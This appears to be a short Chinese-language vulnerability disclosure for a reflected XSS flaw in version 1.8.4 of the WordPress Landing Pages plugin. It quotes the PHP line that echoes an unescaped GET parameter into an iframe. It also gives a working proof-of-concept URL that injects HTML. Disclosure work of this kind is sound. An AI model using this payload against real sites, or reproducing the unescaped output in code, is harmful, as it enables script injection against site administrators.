插件: https://downloads.wordpress.org/plugin/landing-pages.1.8.4.zip
漏洞文件位置在 shared/shortcodes/inbound-shortcodes.php Line ~ 761
<iframe src='<?php echo INBOUDNOW_SHARED_URLPATH . 'shortcodes/'; ?>preview.php?sc=&post=<?php echo $_GET['post']; ?>' width="285" scrollbar='true' frameborder="0" id="inbound-shortcodes-preview"></iframe>
从上述文件可以看到 GET 方式传过来的参数 post 直接输出到 html 中造成了XSS
触发 url 如下
http://localhost/wordpress/wp-admin/post-new.php?post_type=inbound-forms&post=%27%3E%3C%2Fiframe%3E%3Ch1%3Exss%40TEST%3C%2Fh1%3E
结果如图
<img alt=“Clipboard Image.png” src=“https://images.seebug.org/contribute/9a4ed6a6-2f1c-4323-81ea-23740e4a652b-Clipboard Image.png”></img>